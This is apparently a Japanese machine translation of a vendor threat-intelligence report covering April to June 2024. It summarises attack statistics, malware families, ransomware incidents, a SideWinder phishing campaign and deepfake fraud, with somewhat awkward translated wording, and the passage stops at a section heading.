重要な実用的インテリジェンス
本レポートは、お客様が組織の安全確保に積極的に活用できる実用的なインテリジェンスの提供に重点を置き、世界の脅威情勢を包括的にレビューしています。本レポートは4月から2024年6月までを対象としています。レポートのハイライトは以下の通りです:
BlackBerry®サイバーセキュリティ・ソリューションによって阻止されたユニークなマルウェアと攻撃は、それぞれ前報告期間から53 %と18% 増加している。BlackBerry 、毎日平均11,500以上のユニークなマルウェア・ハッシュが捕捉されている。
詳しくは「クォータリー・アタック」をお読みいただきたい。
今四半期、重要インフラに対する攻撃は80万件を超え、その50 %が金融セクターを標的としていた。
サイバー脅威インテリジェンス(CTI)チームによる社内外の調査結果を「重要インフラ」セクションでご覧ください。
このサイクルでは営利企業が大きな標的となっており、停止した攻撃のうち66%が資本財を供給する企業に対するものだった。
これらの脅威については、営利企業のセクションをお読みください。
新しいセクション「Law Enforcement Limelight」では、カナダ全国サイバー犯罪調整センター(NC3)の調査結果を掲載し、これらのレポートに新たな側面を加えている。
カナダを標的としたランサムウェアの流行について続きを読む。
この報告期間中、知名度の高い犯罪グループ(すなわちランサムウェアグループ)の多くが非常に活発に活動していた。これらのグループは、目的を達成するためにさまざまな複雑なツールを使用している。
脅威のアクターとツーリング」の続きを読む
サイバー脅威の状況は、最新の脆弱性を悪用するグループや、新しい、あるいは更新されたマルウェア・ファミリーを利用するグループの渦の中にある。
すべての主要なオペレーティング・システムでトレンドとなっている脅威については、「一般的な脅威」のセクションをお読みください。
悪意のある情報窃取者(別名インフォステーラー)は、貴重な情報や認証情報を流出させるために、脅威行為者によって利用される顕著な武器である。
CylanceMDR™Observationsセクションにある流出ツールに関する我々の見解をお読みください。
地政学的分析では、巧妙なサイバー脅威の増加がサイバーセキュリティ教育の強化の必要性をいかに強調しているかを考察している。
BlackBerry 、マレーシア初のサイバーセキュリティ・センター・オブ・エクセレンス(CCoE)でサイバー教育にどのように投資しているかをご覧ください。
目次
今期のサイバー攻撃総件数
2024年4月から6月にかけて、BlackBerry サイバーセキュリティ・ソリューションは370万件のサイバー攻撃を阻止した。これは、1日当たり43,500件以上のサイバー攻撃を阻止したことになり、2024年1月から3月までの前回の報告期間よりも18%増加しています。
また、当社の顧客基盤を標的としたマルウェアの ユニーク サンプル数は、1日 平均11,500件 で、前回のレポートから 53%増加しました。これは、Global Threat Intelligence レポートを開始して以来、前四半期比で最も高い増加率の 1 つです。バイナリのハッシュを変更したり、独自のペイロードを生成したりすることは、熟練した脅威行為者にとっては複雑なことではありませんが、「攻撃を阻止」した件数と「独自のハッシュ」の件数が異常に多いことは重要です。これは、マルウェアの開発者が、回復力を高めるためにコードを迅速に更新し、適応させていることを示しています。新しいマルウェアが順応し、既存のマルウェアファミリが能力を増し、敵対者がより高度な戦術を急速に採用していることを、生の数字が示唆しています。その結果、難読化、巧妙化、回避技術が強化され、より強力なマルウェアが生み出されることになります。
BlackBerry は、サイバー犯罪者がサイバーセキュリティ・システムを迂回する努力を行っている中、マルウェア・ファミリーの改変を積極的に監視し、特定しています。本レポートでは、当社の脅威リサーチ・インテリジェンス・チームによる最新の調査結果をご覧いただくとともに、現在どのようなグループが各タイプのマルウェアを使用しているかを知り、これらのタイプの脅威に対する戦略的サイバー防御に関する当社の推奨事項をご確認いただけます。
お気づきのように、攻撃の総数と ユニーク ハッシュ(新しいマルウェア)の数は必ずしも相関しません。次のセクションの図2から図9が示すように、すべてのサイバー攻撃がユニークなマルウェアを使用しているわけではありません。攻撃者の動機、攻撃の複雑さ、包括的な目標(スパイ活動、金銭的利益、ターゲットへの一般的な被害の発生など)によって異なります。
(*このレポートは120日サイクルをカバーしています。他のレポートはおおよそ90日周期)
国別サイバー攻撃総数
攻撃を阻止
米国のBlackBerry ソリューションを利用する組織は、今回のサイクルで最も多くの攻撃を受けた。米国以外では、韓国、日本、オーストラリア、ニュージーランドも高いレベルの攻撃を受け、トップ5にランクインし、アジア太平洋地域(APAC)が2番目に標的の多い地域となりました。
BlackBerry の関与が強まっているAPAC地域では、地政学的緊張がサイバー動向に影響を与え続けている。重要なインフラ、サプライチェーン、企業に対する国家主導および非国家主導のサイバー攻撃は増加の一途をたどっている。組織は、サイバースパイ、盗聴、ランサムウェア、フィッシング攻撃など、数多くの脅威からますます狙われるようになっている。サプライチェーンや組織の回復力を高めるためには、インフラ、データ、デバイス、通信の保護に注意を払い、警戒を強める必要がある。
図2は、BlackBerry サイバーセキュリティ・ソリューションが最も多くのサイバー攻撃を阻止し、悪意のあるバイナリの大半を受け取った上位5カ国を示している。
ユニークなマルウェア
今期のサイバー攻撃総件数」のセクションに記載されているように、BlackBerry 、当社の顧客ベースを標的とした1日平均11,500件の 新規 ハッシュ (ユニークなマルウェア)が観測され、前回のレポートから53%増加しました。これは、定期レポートを開始して以来、前四半期比で最も高い増加率の1つです。このユニークマルウェアの増加には多くの要因があります。1つは、複数の従業員が騙されることを期待して、標的型フィッシングメールや企業特有の誘い文句で従業員全体の電子メールリストを狙うなど、マクロレベルでの標的型攻撃の増加です。
図 2 が示すように、米国、日本、韓国、オーストラリアは、前期のレポートと同様、依然として上位を占めています。図 2 が示すとおり、米国、日本、韓国、オーストラリアは、前期のレポートと同様、依然として上位を占めています。また、カナダは現在、ユニーク・マルウェアの感染国として第5位となっています。
結果比較
サイバーストーリーハイライトAPACにおけるスパイ活動
トランスペアレント・トライブ社、クロスプラットフォームのプログラミング言語を活用し、インド政府、防衛、航空宇宙セクターを狙う
最新の取り組みとして、BlackBerry の研究者は、インドの政府、防衛、航空宇宙分野を標的とするパキスタンの高度持続的脅威(APT)グループ、Transparent Tribe を特定した。2013年以来サイバースパイ活動を行っていることで知られるこのグループは、PythonやGolangなどのクロスプラットフォーム言語を使用し、TelegramやDiscordなどのウェブサービスを悪用しています。最近のキャンペーンには、インドのベンガルール(旧バンガロール)の主要な航空宇宙関係者を狙ったスピアフィッシング・メールが含まれる。Transparent Tribeは、その出自を隠そうとしていたにもかかわらず、その手口やツールは、彼らのものであることを示していた。
産業別サイバー攻撃
BlackBerry は、業界セクターを重要インフラと商業企業の 2 つに大別している。BlackBerry'sの重要インフラの遠隔測定と統計は、Cybersecurity and Infrastructure Security Agency (CISA)によって重要インフラと定義された16セクターの顧客から得られている。これらのセクターには、医療、政府、エネルギー、農業、金融、防衛が含まれる。営利企業内の事業体は、商品やサービスの生産、流通、販売に従事している。これらの企業は、製造業、小売業、サービス業など様々な分野で事業を展開している。
重要インフラ
重要インフラは、サイバー犯罪者にとって有利な標的である。このデータは非常に貴重であることが多く、他の脅威グループに転売されたり、攻撃計画に利用されたり、あるいはスパイ活動に利用されることもあります。重要インフラを標的とする脅威者は、バックアップからの復元に時間をかけるよりも身代金を支払うことを組織が好む可能性があるため、攻撃でランサムウェアを使用することに頼るかもしれない。ヘルスケアのような重要なサービスを提供する組織にとっては時間が最も重要であり、脅威行為者はこのことを十分に理解している。
今年は、地政学的な混乱により、重要インフラが、その国の政策に反対する敵対勢力や、その国の政策に協力する敵対勢力の標的となった。このため、脅威グループや国家スポンサーは、特に重要インフラを標的とするようになる。
重要インフラのデジタル化が進むにつれ、この分野は近年、サイバー犯罪者にとってさらに脆弱なものとなっている。脅威者は、システムの設定ミスやパッチが適用されていないレガシーシステムなどの脆弱性を攻撃したり、従業員に対して実施されるソーシャルエンジニアリングキャンペーンを通じてシステムに侵入しようとするなど、重要システムを積極的に悪用している。
2024年4月から6月までの期間において、 CylanceENDPOINTおよびその他のBlackBerry サイバーセキュリティ・ソリューションは、重要インフラ産業部門の組織に対する80万件以上の攻撃を阻止しました。これらの攻撃のほぼ半数は金融セクターの企業に対するものであり、前期比で10%増加しています。一方、政府および公共セクターの組織は、ユニーク・ハッシュの45%以上を集め、最も多様な攻撃を経験しています。
また、BlackBerry のサイバーセキュリティ・ソリューションが遭遇した業界固有のサイバー攻撃の41%は重要インフラに対するものであった。
-
重要インフラ内部脅威
内部脅威とは、BlackBerry が自社の顧客ベース内で特定し、防御する脅威である。外部からの脅威(次のセクションで取り上げる)とは、業界紙、セキュリティ・ベンダー、政府機関など、第三者から報告される脅威のことである。
-
ヴィダール
タイプインフォスティーラー
ターゲット通信、ヘルスケア
地域ラテンアメリカ(LATAM)、北米
Vidarは2018年から存在する情報窃盗犯だ。かつて悪名を馳せた情報窃取者Arkeiの分派である可能性が高いVidarは、極めて活発な活動を続けており、しばしばアンダーグラウンド・フォーラムでマルウェア・アズ・ア・サービス(MaaS)を介して販売されている。このマルウェアは非常に柔軟性が高く、フィッシング文書やマルバタイジング(マルウェアを拡散させる広告)、他のマルウェアを介した二次配布など、さまざまな方法で被害者のデバイスに落とすことができる。2024年の初めには、Vidarが重要なインフラを標的にするためにも使用されていることが確認されています。この報告期間中、Vidarは、特にラテンアメリカ諸国において、主に通信およびヘルスケア分野を攻撃していることが確認されており、北米ではヘルスケアを標的としていることも確認されています。
-
スモークローダー
タイプダウンローダー
ターゲット食料・農業、ヘルスケア
地域 ラタム、北米
2011年から稼働しているSmokeLoaderは、さまざまなトロイの木馬、情報窃取、さらにはランサムウェアを含む、第2段階の悪意のあるペイロードの著名な配信メカニズムです。MaaSとして販売されているSmokeLoaderは、ユーザー認証情報を採取することもできます。追加のマルウェアを展開する能力があるため、多くの著名な脅威グループに人気がある。2024年5月、欧州刑事警察機構(Europol)は、悪意のあるダウンローダーを標的とした「Operation Endgame」を実施した。100以上のマルウェアサーバがダウンまたは停止され、2,000以上のドメインが法執行機関によって押収されました。これらの措置により、SmokeLoaderの背後にいる脅威グループの活動は大幅に停止しましたが、今四半期においても、北米の医療分野や中南米の食品・農業分野において、同マルウェアに関連するバイナリが確認されています。
-
ライズプロ
タイプインフォスティーラー
ターゲット電気通信、食品・農業、ヘルスケア
地域ラタム、北米
RiseProは、アンダーグラウンド・フォーラムでMaaSとして販売されることが多い多機能情報窃取ツールである。RiseProは当初、2022年後半に観測された。その後、2023年後半から2024年前半にかけて、BlackBerry 、RiseProの活動が急激に増加していることに気づきました。
RisePro infostealerは、悪意のあるリンクや電子メールの添付ファイルなど、さまざまな方法で被害者のデバイスにインストールされます。また、マルウェア配布サービスとしてよく使用されるペイ・パー・インストール(PPI)マルウェアであるPrivateLoaderを介して展開されることもあります。
被害者のデバイスに侵入すると、RiseProはコマンド・アンド・コントロール(C2)サーバーと通信し、そこでデータを盗み出したり、追加のマルウェアを投下したり、デバイスから情報を流出させたりするコマンドを受け取ります。今期、RiseProは、ラテンアメリカ諸国では食品、農業、電気通信企業を、北米では医療サービスを標的としていることが確認されています。
-
グローダー
タイプダウンローダー
ターゲット教育、交通、医療、食料、農業
地域 APAC、北米
GuLoader(別名CloudEyE)は、他のマルウェアを配布する著名なダウンローダーです。2020年以降、GuLoaderの背後にいる脅威グループは、セキュリティサービスによる攻撃の特定や対策の考案がより困難になるよう、アンチ解析技術を追加しています。GuLoaderは通常、他のマルウェア、すなわちFormBook、Agent Tesla、Remcosのような情報窃取者と連携して動作します。
今回の報告サイクルでは、GuLoaderは主に北米の運輸、食品、農業、教育分野の組織を標的としているようであった。しかし、GuLoaderのバイナリは、APAC諸国の輸送会社でも発見された。
-
ルマ・スティーラー
タイプインフォスティーラー
ターゲット食料・農業、エネルギー、金融
地域 APAC, LATAM, 北米
Lumma Stealer(別名LummaC2)はCベースの情報窃盗犯で、2回目の報告期間中、LATAMの食品および農業企業、APACのエネルギー・セクターを標的としている。Lumma Stealerは、銀行詐欺を行うためにログイン認証情報や銀行情報のような機密データの流出を専門とするMaaSです。さらに、Lumma Stealerは北米とAPACの金融サービス企業を標的としていた。
サイバーストーリーハイライト重要インフラに対する脅威
サイドワインダー、地中海の港湾・海上施設をターゲットに新たな流通インフラを活用
2024年7月、BlackBerry Threat Research and Intelligence Teamは、SideWinderとして知られる脅威グループによる新たなキャンペーンを発見しました。Razor Tiger、Rattlesnake、T-APT-04としても知られるSideWinderグループは、少なくとも2012年から活動しています。同グループはこれまで、パキスタン、アフガニスタン、中国、ネパールに特に焦点を当て、軍事、政府、企業を標的としていることが確認されている。SideWinderは通常、電子メールのスピアフィッシング、ドキュメントの悪用、DLLのサイドローディングのテクニックを使用して検出を回避し、標的型インプラントを配信します。
このキャンペーンでは、BlackBerry 、非常に特定のポートインフラに関連する3つの偽装された「視覚的おとり」文書を観測した。ビジュアル・デコイは通常、それ自体に悪意があるわけではなく、その主な目的は、被害者が危険にさらされていることに気づかせないように注意をそらすことです。被害者は通常、標的企業の従業員です。以下は、SideWinderの最新キャンペーンの例です:
脅威行為者は、被害者が視覚的な餌となる文書を開いて読むよう誘惑するために、さまざまな手口を使う:
- 攻撃者は、受信者が仕事や業界の関係でよく知っていると思われる合法的な組織の本物のロゴをコピーします。上の図7では、攻撃者がエジプトの紅海港湾局(Red Sea Ports Authority)のロゴを悪用しています。
- 文書の見出しは、受信者に最大限の不安を与えるように設計されています。上記の例の見出し(「EMPLOYEE TERMINATION AND SALARY CUT NOTICE」)は、従業員に仕事と家計の安全を心配させることを意図しています。
- 上記のサンプルでは、本文中に「手元資金をほとんど使い果たした」、「深刻な懸念」、「雇用を打ち切る」といった感情的な表現が含まれていることに注意してください。これらのフレーズは太字で書式設定されているため、読者の目にすぐに留まります。
脅威を仕掛ける側は、親しみのある企業のロゴを使用し、恐怖や仕事の安全への懸念といった強い感情を引き出すことで、被害者が文書を正当なものだと信じ、強い不安の中で文書を読まざるを得なくなることを期待しています。そうすると、被害者は注意力が散漫になり、システムのポップアップやCPU使用率の高さによるファンノイズの増加など、デバイス上の奇妙な現象に気づかなくなる。
調査中に明らかになったデータを分析した結果、サイドワインダーの新たなキャンペーンはインド洋と地中海の港湾と海上施設を標的としていると、中程度の確信を持って結論づけました。サイドワインダーの過去のキャンペーンから、この新しいキャンペーンの目的はスパイ活動と情報収集であると我々は考えている。BlackBerry ブログで全文を読む。
重要インフラ外部からの脅威
BlackBerry また、外部の脅威、つまり外部組織から報告された脅威で、必ずしもBlackBerryのテナントで発見されたものではないものについても、綿密に追跡している。この期間中、政府機関、業界報道機関などの外部グループから、重要インフラに対する攻撃が世界中で多数報告された。
3月最後の数日間、インドの様々な政府機関やエネルギー・セクターが、フリーで利用可能な情報窃取ツールHackBrowserDataのカスタマイズされた亜種に感染したというニュースが流れた。感染経路としてフィッシングメールを利用し、流出経路としてSlackチャンネルを利用したこの未知の脅威者は、従業員の詳細情報や財務記録を含む8.8GBの機密データを盗み出しました。
テキサス州に本社を置く通信会社フロンティア・コミュニケーションズは4月、米国証券取引委員会(SEC)に、4月14日に情報漏洩を検知し、復旧のためにシステムの一部を停止せざるを得なかったことを報告した。未知の脅威者は、個人を特定できる情報を含む機密データにアクセスすることができた。
また4月には、ウクライナのコンピュータ緊急対応チーム(CERT-UA)が、ロシアが支援したとされるグループ「サンドワーム」による、戦乱の国内にあるさまざまな重要インフラ事業体への攻撃計画を報告した。この計画は、水やエネルギーを含む様々な重要インフラ部門にわたる約20の事業体を標的としていた。サンドワームによるウクライナの重要インフラへの攻撃の歴史は長く、ロシアとウクライナの戦争が続く中、今後も続くと思われる。
5月の第1週は、親ロシア派によるハクティビストの脅威が続いているとして、英国のナショナル・サイバー・セキュリティ・センターおよびカナダのサイバーセキュリティ・センター(CCCS)と共同で、米国の複数の機関から勧告が出された。ハクティビストは、水、エネルギー、ダム、農業など、インターネットに接続された重要インフラを標的としていた。彼らの活動は、ヨーロッパと北米の重要インフラ部門のインターネットに面した運用技術(OT)システムに焦点を当てていた。
5月初旬、BlackBastaランサムウェアの運営者は、全米18州に約140の病院を持つ非営利の大手カトリック系医療機関を標的にした。そして6月初旬、BlackBastaはメリーランド州に拠点を置くバイオテクノロジー企業Elutiaから550GBのデータを盗み出した。データには従業員情報や財務情報が含まれていた。
ヘルスケアを標的にしたランサムウェア集団はBlackBastaだけではなかった。6月下旬、BlackSuitランサムウェアグループが南アフリカのNational Health Laboratory Service(NHLS)とその265のラボに侵入した。BlackSuitは、攻撃的で危険なランサムウェア集団Contiの派生型と考えられている。BlackSuitの侵入は、サル痘(mpox)の流行と重なり、NHLSのシステムに大きな影響を与えました。脅威者はバックアップを含むNHLSシステムの一部を削除しましたが、機密性の高い患者データが失われたことは報告されていません。
これらの攻撃や前四半期中の他の攻撃は、重要なインフラ、特に医療セクターを標的とするランサムウェアの運営者が依然として根強い問題であることを示している。
民間企業
この報告期間中、営利企業に対する内部脅威も大幅に増加した。BlackBerry のサイバーセキュリティが阻止した攻撃の数(110万件)は、前回の報告と比べて60%増加した。
民間企業部門では、資本財部門に対する攻撃が大幅に増加していることが確認された。消費財とは異なり、資本財には、営利企業や重要なインフラを通して様々な産業に不可欠な機械、工具、設備が含まれます。これらの資産を標的にすることは、企業のデジタルおよび物理的なサプライチェーンに影響を与える可能性があります。
-
営利企業:内部脅威
内部脅威とは、BlackBerry が自社の顧客ベース内で特定し、防御する脅威である。外部からの脅威(次のセクションで取り上げる)とは、業界紙、セキュリティ・ベンダー、政府機関など、第三者から報告される脅威のことである。
-
アマデイ
タイプボット/詐欺師
ターゲット製造業、商業サービス業、資本財
地域欧州、中東、アフリカ(EMEA)、APAC、LATAM
2018年に初めて登場したAmadeyは、現在も脅威の現場で活動を続けているモジュール型マルウェアです。反復的な変更を通じて、最近の通信の進歩に関連性を保っている。Amadeyは、C2にデータを流出させる前に、インテリジェンスを収集し、被害者のマシンをポーリングすることができます。また、他のマルウェアを一斉に拡散するボットネットワークとして使用されることも多く、情報窃取者や悪意のあるクリプトマインダーの配備を促進することも頻繁にあります。
この報告期間中、アマデイはEMEA、APAC、LATAM地域における製造および商業サービス、また特にLATAM諸国における資本財サービスをターゲットとした。
-
プライベートローダー
タイプダウンローダー
ターゲット製造業、商業サービス業
地域APAC, LATAM, 北米
PrivateLoaderは、マルウェアを配布するための有料インストールサービスとして動作する、マルウェアの広範な促進者です。多くの場合、「クラックされた」ソフトウェアをホストする偽のウェブサイトを介して配布されるPrivateLoaderは、RiseProのような広範な情報窃取者を含む、さまざまな悪意のあるペイロードをダウンロードすることができます。PrivateLoaderは、SEOポイズニングとして知られるテクニックを使用し、偽ウェブサイトの存在感を高めます。このテクニックは、検索結果の上位が最も信頼できると思わせることでユーザーを騙し、検索結果をよく見ていない場合に非常に効果的です。この報告期間中、PrivateLoaderは北米の製造業、中南米とアジア太平洋地域の商業サービスを標的としていた。
-
テスラ捜査官
タイプリモートアクセス型トロイの木馬
ターゲット製造業、食品小売業、商業サービス業
地域APAC, LATAM, 北米
Agent Teslaは、2014年以来、Microsoft Windows OSベースのシステムを使っているユーザーを積極的にターゲットにしている、情報窃盗に特化した著名なリモートアクセス型トロイの木馬(RAT)です。アンダーグラウンドのフォーラムを通じて販売され、MaaSとして提供されるこの商用マルウェアは、機密データや認証情報を盗み出し、キー入力を記録し、被害者の画面のスクリーンショットをキャプチャすることで知られています。このマルウェアはしばしばフィッシング・キャンペーンに利用され、トロイの木馬化されたクラック・ソフトウェアとしてホスト/配布されています。
このサイクルでは、APAC、LATAM、北米の国々で、製造業、食品小売業、商業サービス業など、多くのセクターがテスラ代理店の標的となった。
-
フォームブック
タイプインフォスティーラー
ターゲット食品小売業
地域APAC
FormBookとその進化系であるXLoaderは、複雑な情報窃取と、追加マルウェアのための多用途なダウンローダーの両方として動作する洗練されたマルウェア・ファミリーです。これらのマルウェアファミリーは、その誕生以来、アンチVMテクニック、プロセスインジェクション、カスタム暗号化ルーチンによってサイバー防御を回避し、回避するために、弾力性を持ち、常に進化し続けています。
MaaSとして販売されることが多いXLoaderは、ブラウザや電子メールクライアント、その他さまざまなアプリケーションからデータを盗むことができる。今四半期、XLoaderに関連する多くのサイバー事件がAPAC諸国の食品小売業者を標的にした。
-
ライズプロ
タイプインフォスティーラー
ターゲット商業サービス、資本財
地域APAC
RiseProは、アンダーグラウンド・フォーラムでしばしばMaaSとして販売されている多機能情報窃盗犯である。RiseProは当初、2022年後半に観測された。その後、2023年後半から2024年前半にかけて、BlackBerry 、RiseProの活動が急激に増加していることに気づきました。RiseProは、多くの場合、悪意のあるリンクや電子メールの添付ファイルを通じて、さまざまな方法で被害者のデバイスにドロップされます。また、マルウェア配布サービスとして頻繁に使用されるPPIマルウェアであるPrivateLoaderを介して展開されることもあります。デバイス上に侵入すると、RiseProはC2サーバーと通信し、そこでデータを盗んだり、追加のマルウェアを落としたり、被害者のデバイスから情報を抜き取ったりするコマンドを受け取ります。
-
ヴィダール
タイプインフォスティーラー
ターゲット製造業、食品小売業、商業サービス業、資本財
地域アジア太平洋、中東、ラタム
Vidarは2018年から存在する情報窃盗犯で、Arkeiとして知られる情報窃盗犯の分派かもしれない。Vidarは非常に活発に活動しており、アンダーグラウンドのフォーラムを通じてMaaSとして販売されることも多い。このマルウェアは非常に柔軟で、フィッシング文書やマルバタイジング(マルウェアを拡散する広告)、他のマルウェアを介した二次配布など、さまざまな方法で被害者のデバイスに落とすことができる。この報告期間中、Vidarは、EMEAの製造業、APACの食品小売業、LATAMの資本財、LATAMとAPACの商業サービスなど、多くの商業エンタープライズ業界を標的とした。
営利企業外部からの脅威
4月上旬、IxMetro PowerHostは、流出したLockBit 3.0のソースコードを使用したとされる比較的新しいランサムウェア集団SEXiによるサイバー攻撃を受けました。このグループは組織のVMware ESXiサーバーとバックアップを標的にし、チリのIxMetro PowerHostのサービスに大きな混乱をもたらした。
また、4月には中国のショッピングプラットフォーム「パンダバイ」が不正アクセスを受け、130万人以上の顧客データがネット上に流出した。Pandabuyは、ユーザーが他の中国のeコマース・プラットフォームから商品を購入することを可能にしている。Sanggieroとして知られる脅威行為者は、この攻撃の責任を主張し、プラットフォームのAPI内の重要なサーバーの脆弱性を悪用し、小売業者の内部サービスにアクセスしたと述べた。Eコマース小売業者は当初、データ流出を防ぐために要求を支払った疑いがある。しかし、2024年6月、同じ脅威行為者が再び中国ベースのプラットフォームを悪用し、恐喝したと主張している。
5月上旬、大手多国籍テクノロジー企業が、約5,000万人に影響する大規模なデータ漏洩を顧客に警告した。このテクノロジー企業は、財務情報の漏洩がなかったことを確認したものの、顧客の氏名や住所など、個人を特定できる情報(PII)が流出したことを明らかにした。にもかかわらず、このテクノロジー企業は、盗まれたデータが非金融的なものであるため、情報漏洩の潜在的な影響を軽視している。
今年5月、脅威グループShinyHuntersが多国籍エンターテイメントチケット販売・流通会社に侵入し、5億6,000万人以上の顧客データを盗み出した。データには、氏名、住所、電子メールなどの個人情報、ハッシュ化されたクレジットカード情報が含まれていた。影響を受けたユーザーには郵送で通知された。
6月、アメリカの多国籍ソフトウェア会社がランサムウェア攻撃による大規模な機能停止に見舞われ、北米の数千の自動車ディーラーの業務に影響を与えた。この障害は、1万5,000カ所以上に及ぶディーラーの自動車販売や修理など、あらゆる活動に影響を及ぼした。ランサムウェアグループのBlackSuitがこの攻撃の責任を主張し、身代金として約2500万米ドルの暗号通貨を要求した。同組織はシステムを復旧させるために身代金を支払ったとされている。
6月下旬、北米を拠点とするソフトウェア・サービス会社TeamViewerは、多発するAPTグループCozy Bear(別名APT29)が同社の企業ITシステムを攻撃したことを確認した。Cozy Bearはロシアを拠点とするハッキンググループで、ロシアの対外情報庁に所属しているとされている。同グループは、2020年のSolarWindsの侵害を含め、長年にわたって複数の攻撃や悪用を行なってきた。TeamViewerは声明を発表し、漏洩したのは従業員のアカウントデータのみで、Cozy Bearが本番環境や顧客データにアクセスした形跡はないと主張した。
サイバーストーリーハイライト営利企業に対するディープフェイク
従業員の警戒:ディープフェイク詐欺に対する防御の第一線
ディープフェイクの写真、動画、「ディープボイス」音声が、サイバーセキュリティでますます問題になっている。ディープフェイクとは、生成人工知能(AI)を使用して作成されたデジタル操作されたメディアのことで、最も一般的な使用例は「フェイススワップ」(ある人物の顔を別の人物にデジタル的に重ね合わせること)である。ディープフェイク・メディアは多くの場合、非常にリアルで説得力があり、フィッシング詐欺、偽の電話、さらには受信者に上司など別の従業員から正当な依頼を受けていると思わせることを意図した偽のビデオ通話など、幅広い攻撃で使用するために悪意のある行為者によって武器化される可能性がある。
2017年後半にディープフェイクを作成する最初のアプリがRedditユーザーによって立ち上げられて以来、ディープフェイクは電光石火の速さで進化し、従業員を騙してログイン認証情報、財務記録や顧客記録を攻撃者に提供させ、さらには数百万ドルの会社資金を詐欺師に送金させるという恐ろしいほど効果的なものになっている。
最近の事件では、自動車メーカーのフェラーリが高額なディープフェイク詐欺から逃れた。ある幹部が、CEOのベネデット・ヴィーニャになりすました人物から不審な電話を受けた。詐欺師のアクセントや口調は本物のCEOとほとんど同じだったが、その幹部は、見慣れない電話番号の使用やメッセージの緊急性といった赤信号に気づいた。
電話の主の身元を確認するため、幹部は推薦図書について具体的な質問をした。詐欺師が答えられないと、電話を切った。この重役の機転が災難を回避し、フェラーリは通信の安全性を確保するために社内調査を開始した。
この事件は、会社を詐欺から守るために従業員が果たす重要な役割を浮き彫りにしている。ほぼすべてのディープフェイク攻撃の重要な構成要素は、ソーシャル・エンジニアリングである。脅威者は、従業員が企業のセキュリティ境界の最も弱いリンクであると想定し、ターゲットの信頼を得るために心理操作のテクニックを使う。通常とは異なる要求、特に金銭や機密情報の授受を伴う要求に対して、警戒心を保ち、疑心暗鬼になっている従業員に賞賛を送りたい。彼らの意識と迅速な行動が、企業を大きな金銭的損失と風評被害から救うことができる。
企業は、詐欺師が「偽」の電話/ビデオ通話、電子メール、テキストの背後にいるかもしれないことを示す赤信号について従業員を教育することによって、セキュリティを向上させることができます。まずは、日々巧妙な脅威から組織を守ってくれている縁の下の力持ちを称え、支援することから始めましょう。この逸話を同僚や同僚と共有してください。何かおかしいと思ったら、自分の直感を信じて、要求者の身元を確認する二次的な方法を見つけるよう、彼らに思い出させるのだ。
ディープフェイクの詳細については、当社のホワイトペーパーをお読みください、 ディープフェイクの正体を暴く:増大する脅威の背後にあるテクノロジーとテクニック.
地政学的分析とコメント
世界中の政府は、テクノロジーが地政学的対立の原動力となっている事実をますます明確に認識するようになっている。2024年5月6日、カリフォルニア州サンフランシスコで開催されたRSAカンファレンスでの講演で、アントニー・J・ブリンケン米国務長官は、各国が欧米か中国の技術スタックを採用せざるを得ないゼロサム競争の入り口にある世界について述べた。ブリンケン長官のサイバースペース・デジタル政策担当大使であるナサニエル・C・フィックは、「国際秩序は、どちらのOSが支配的であるかによって定義されるだろう」と述べた。
ジェネレーティブAIのような技術がかつてないスピードで進歩していることから、高度なデジタル技術の「責任ある」利用を求める活動が活発化している。AIのようなテクノロジーは、経済成長を促進し、社会を変革し、世界で最も困難な問題(気候変動、不平等、疾病など)に取り組む大きな可能性を秘めている一方で、特に人々が日々依存している重要なインフラやサービスにリスクが顕在化した場合、大きな影響を及ぼすリスクももたらす。
本レポートで強調されているように、国家に支援されたグループを含むサイバー犯罪者が、重要インフラを標的にするケースが増加している。サービスを妨害したり、重要インフラの運営者や所有者に身代金を要求したりする悪意や犯罪的意図のある事件は、過去数年間で世界的に急増している。この報告期間中、BlackBerry は重要インフラに対する80万件以上の攻撃を記録しており、その50%が金融セクターを標的としている。加害者は、これらのサービスの重要性を認識しており、これらのサービスに最大限の混乱を引き起こそうとしたり、引き起こすと脅したりすることで、身代金を引き出す努力を最大化しようとしている。
オリンピックやFIFAワールドカップなどの主要な国際スポーツイベントも、サイバー脅威の焦点となっている。悪質なサイバー活動が劇的に増加することを見越して、カナダのサイバーセキュリティセンターは2024年5月にサイバー脅威速報を発表し、「サイバー犯罪者は、ビジネスメールの漏洩やランサムウェア攻撃を通じて、主要な国際スポーツイベントに関連する大規模組織や主要スポーツイベント周辺の地元企業を標的にする可能性が非常に高い」と評価している。また、これらのイベントを攻撃のおびき寄せるフィッシングメールや悪意のあるウェブサイトに注意するよう、参加者や観客に警告している。
実際、オリンピック終了後、フランス当局は2024年オリンピックに関連した140件以上のサイバー攻撃を報告したが、そのすべてが "低影響 "であった。しかし、過去のオリンピックの傾向からすると、この数字は過小評価である可能性が高い。例えば、2021年に開催された東京オリンピックでは、主催者は4億5000万件のサイバー攻撃を報告している。
世界経済フォーラム(WEF)が「グローバル・サイバーセキュリティ・アウトルック2024」で指摘しているように、政府と企業は、大規模な混乱を引き起こす可能性のある、急速にエスカレートし巧妙化するサイバー脅威に対するサイバー耐性を維持するのに苦慮している。さらに、組織が自らを守る能力には大きな隔たりがある。WEFによると、従業員10万人以上の組織の85%がサイバー保険に加入しているのに対し、従業員250人未満の組織でサイバー保険に加入しているのは21%に満たない。全体として、最小規模の組織は、「最低限重要な業務要件を満たすために必要なサイバー耐性を欠いていると回答する確率が、最大規模の組織の2倍以上」である。大規模組織と小規模組織の間のこの不均衡に対処する必要がある。
サイバー・テクノロジーの手頃な価格が重要な要素として強調される一方で、教育やサイバー意識も重要な要素となっている。利用しやすいセキュリティ・ソリューションの提供に加え、BlackBerry がサイバー教育に投資しているのはこのためだ。2024年3月、BlackBerry 、マレーシアで初のサイバーセキュリティ・センター・オブ・エクセレンス(CCoE)を発足させた。CCoEは卓越したサイバーセキュリティ・トレーニングと脅威インテリジェンスを提供し、マレーシアとインド太平洋地域のパートナー政府・組織が直面するサイバー脅威をより適切に予防、抑止、対応できるよう支援する。
サイバーセキュリティの水準を高め、400万人近い訓練を受けたサイバー専門家の世界的な不足を補うためには、さらに多くのことを行う必要がある。デジタル技術やクラウドベースの技術に依存する組織や業界が増えるにつれ、サイバーセキュリティに対する強固で多面的なアプローチの必要性が極めて重要になっている。
法執行ライムライト
法執行能力の強化NC3の専門サポート
